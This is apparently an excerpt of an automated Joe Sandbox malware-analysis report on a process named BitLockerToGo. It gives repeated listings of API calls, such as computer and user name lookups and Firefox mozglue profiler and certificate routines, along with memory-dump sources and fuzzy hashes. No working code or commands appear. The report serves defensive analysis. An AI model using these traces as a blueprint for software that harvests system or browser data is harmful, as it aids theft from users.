                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPathlstrcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1699248803-0
                                                                                                                                                                • Opcode ID: e3aaab96e37d99c1d0e327c915c5528e1f9ef7b7b0ba6632c36afd6f15030ea4
                                                                                                                                                                • Instruction ID: cc881e20b0aa0786bcd11754bb9ed369cbf21428fea09a248166ed5b5987380d
                                                                                                                                                                • Opcode Fuzzy Hash: e3aaab96e37d99c1d0e327c915c5528e1f9ef7b7b0ba6632c36afd6f15030ea4
                                                                                                                                                                • Instruction Fuzzy Hash: CCE01A35A4034C6BDB91EB90DC96FEE737CDB44B11F008295BA0C5A1C0DA70AB958B91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 030178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,03016A2B), ref: 03017910
                                                                                                                                                                  • Part of subcall function 030178E0: RtlAllocateHeap.NTDLL(00000000), ref: 03017917
                                                                                                                                                                  • Part of subcall function 030178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0301792F
                                                                                                                                                                  • Part of subcall function 03017850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,030011B7), ref: 03017880
                                                                                                                                                                  • Part of subcall function 03017850: RtlAllocateHeap.NTDLL(00000000), ref: 03017887
                                                                                                                                                                  • Part of subcall function 03017850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0301789F
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 030011C6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3550813701-0
                                                                                                                                                                • Opcode ID: a8ca315cc766c495e2d027be4b7a9038b570ddadd1b9b5895010613bd1bdd132
                                                                                                                                                                • Instruction ID: 7f5776fb5db11be91e12e2176e9c74905f2c2d05068e7582d9b0e6916af13112
                                                                                                                                                                • Opcode Fuzzy Hash: a8ca315cc766c495e2d027be4b7a9038b570ddadd1b9b5895010613bd1bdd132
                                                                                                                                                                • Instruction Fuzzy Hash: 9EE012BDDD130153EA14F3B4BD09BAA329C6B44645F044424E909D6141FB65E52185A5
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,-00000001), ref: 03018E52
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                • Opcode ID: acb7a8cb397fe5b11bf372aab33ff7fba0f689450f29307b158da982120265aa
                                                                                                                                                                • Instruction ID: 6513f32c9816bd60c1975c6291abc6f3cd033bd0ac1f6c88b6361f1644cf1f57
                                                                                                                                                                • Opcode Fuzzy Hash: acb7a8cb397fe5b11bf372aab33ff7fba0f689450f29307b158da982120265aa
                                                                                                                                                                • Instruction Fuzzy Hash: E9011D34905108EFCB14CF98C5857ACBBF5EF05308F28C488D9056B340C3755B94DB86
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,03010759,?,?), ref: 03009888
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                • Opcode ID: 79e884d45532b9653f382bd0ba6ec7c52085aab0181c7ed0a4098c8a8ba4bb79
                                                                                                                                                                • Instruction ID: ea65012d47e6aaa85a0c464f82d708ca1f7a190960e5eab9fdb96626dbeafa1c
                                                                                                                                                                • Opcode Fuzzy Hash: 79e884d45532b9653f382bd0ba6ec7c52085aab0181c7ed0a4098c8a8ba4bb79
                                                                                                                                                                • Instruction Fuzzy Hash: 1DF054B5D01208FBDB00EFA4C845B9EB7B4EB04300F108498E90597281E7319B14CB91
                                                                                                                                                                APIs
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CC85492
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC854A8
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC854BE
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC854DB
                                                                                                                                                                  • Part of subcall function 6CCAAB3F: EnterCriticalSection.KERNEL32(6CCFE370,?,?,6CC73527,6CCFF6CC,?,?,?,?,?,?,?,?,6CC73284), ref: 6CCAAB49
                                                                                                                                                                  • Part of subcall function 6CCAAB3F: LeaveCriticalSection.KERNEL32(6CCFE370,?,6CC73527,6CCFF6CC,?,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CCAAB7C
                                                                                                                                                                  • Part of subcall function 6CCACBE8: GetCurrentProcess.KERNEL32(?,6CC731A7), ref: 6CCACBF1
                                                                                                                                                                  • Part of subcall function 6CCACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC731A7), ref: 6CCACBFA
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CC854F9
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CC85516
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CC8556A
                                                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CC85577
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000070), ref: 6CC85585
                                                                                                                                                                • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CC85590
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CC855E6
                                                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(6CCFF4B8), ref: 6CC85606
                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC85616
                                                                                                                                                                  • Part of subcall function 6CCAAB89: EnterCriticalSection.KERNEL32(6CCFE370,?,?,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284), ref: 6CCAAB94
                                                                                                                                                                  • Part of subcall function 6CCAAB89: LeaveCriticalSection.KERNEL32(6CCFE370,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CCAABD1
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CC8563E
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC85646
                                                                                                                                                                • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CC8567C
                                                                                                                                                                • free.MOZGLUE(?), ref: 6CC856AE
                                                                                                                                                                  • Part of subcall function 6CC95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC95EDB
                                                                                                                                                                  • Part of subcall function 6CC95E90: memset.VCRUNTIME140(6CCD7765,000000E5,55CCCCCC), ref: 6CC95F27
                                                                                                                                                                  • Part of subcall function 6CC95E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC95FB2
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CC856E8
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 6CC85707
                                                                                                                                                                • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CC8570F
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CC85729
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CC8574E
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CC8576B
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CC85796
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CC857B3
                                                                                                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CC857CA
                                                                                                                                                                Strings
                                                                                                                                                                • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CC85D2B
                                                                                                                                                                • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CC857C5
                                                                                                                                                                • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CC85791
                                                                                                                                                                • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CC8584E
                                                                                                                                                                • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CC85717
                                                                                                                                                                • MOZ_PROFILER_STARTUP, xrefs: 6CC855E1
                                                                                                                                                                • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC8548D
                                                                                                                                                                • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CC85C56
                                                                                                                                                                • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CC85B38
                                                                                                                                                                • MOZ_BASE_PROFILER_HELP, xrefs: 6CC85511
                                                                                                                                                                • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CC85D01
                                                                                                                                                                • [I %d/%d] profiler_init, xrefs: 6CC8564E
                                                                                                                                                                • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC854A3
                                                                                                                                                                • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CC85724
                                                                                                                                                                • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CC85749
                                                                                                                                                                • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC854B9
                                                                                                                                                                • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CC856E3
                                                                                                                                                                • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CC85D1C
                                                                                                                                                                • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CC85766
                                                                                                                                                                • GeckoMain, xrefs: 6CC85554, 6CC855D5
                                                                                                                                                                • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CC857AE
                                                                                                                                                                • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CC85BBE
                                                                                                                                                                • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CC85AC9
                                                                                                                                                                • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CC85D24
                                                                                                                                                                • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CC85CF9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                                • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                                • API String ID: 3686969729-1266492768
                                                                                                                                                                • Opcode ID: f37db7d73a36406b5007abe0915d03a317a5028f2ea5f8145054c7b6c0906b2c
                                                                                                                                                                • Instruction ID: a369094a60de5fd97b2830d2d7775178e9d74a38b090ad5533970127e97ed143
                                                                                                                                                                • Opcode Fuzzy Hash: f37db7d73a36406b5007abe0915d03a317a5028f2ea5f8145054c7b6c0906b2c
                                                                                                                                                                • Instruction Fuzzy Hash: 2E2211B4A053009FFB009F64985866BBBF4EF4634CF04452AE86697B41FBB1C84ACB53
                                                                                                                                                                APIs
                                                                                                                                                                • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC86CCC
                                                                                                                                                                • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC86D11
                                                                                                                                                                • moz_xmalloc.MOZGLUE(0000000C), ref: 6CC86D26
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CC86D35
                                                                                                                                                                • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CC86D53
                                                                                                                                                                • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CC86D73
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CC86D80
                                                                                                                                                                • CertGetNameStringW.CRYPT32 ref: 6CC86DC0
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000000), ref: 6CC86DDC
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC86DEB
                                                                                                                                                                • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CC86DFF
                                                                                                                                                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CC86E10
                                                                                                                                                                • CryptMsgClose.CRYPT32(00000000), ref: 6CC86E27
                                                                                                                                                                • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CC86E34
                                                                                                                                                                • CreateFileW.KERNEL32 ref: 6CC86EF9
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000000), ref: 6CC86F7D
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CC86F8C
                                                                                                                                                                • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CC8709D
                                                                                                                                                                • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CC87103
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CC87153
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 6CC87176
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC87209
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC8723A
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC8726B
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC8729C
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC872DC
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CC8730D
                                                                                                                                                                • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CC873C2
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC873F3
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC873FF
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC87406
                                                                                                                                                                • VerSetConditionMask.NTDLL ref: 6CC8740D
                                                                                                                                                                • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CC8741A
                                                                                                                                                                • moz_xmalloc.MOZGLUE(?), ref: 6CC8755A
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC87568
                                                                                                                                                                • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CC87585
                                                                                                                                                                • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC87598
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CC875AC
                                                                                                                                                                  • Part of subcall function 6CCAAB89: EnterCriticalSection.KERNEL32(6CCFE370,?,?,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284), ref: 6CCAAB94
                                                                                                                                                                  • Part of subcall function 6CCAAB89: LeaveCriticalSection.KERNEL32(6CCFE370,?,6CC734DE,6CCFF6CC,?,?,?,?,?,?,?,6CC73284,?,?,6CC956F6), ref: 6CCAABD1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                • API String ID: 3256780453-3980470659
                                                                                                                                                                • Opcode ID: bb18fad4bad43aef6b8583466ed6c6bfc5ee2785e929de4ef9439d5e51465af7
                                                                                                                                                                • Instruction ID: 073c0f8e2e781be3d4553efccccce344c5ce93d8e38453d48c052f45ef8a5aa4
                                                                                                                                                                • Opcode Fuzzy Hash: bb18fad4bad43aef6b8583466ed6c6bfc5ee2785e929de4ef9439d5e51465af7
                                                                                                                                                                • Instruction Fuzzy Hash: 7852C4B1A012189FEB219F64DC84BAB7BB8FF46708F104199F519A7640FB70AE85CF51
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CCB0F1F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CCB0F99
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CCB0FB7
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CCB0FE9
                                                                                                                                                                • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CCB1031
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CCB10D0
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CCB117D
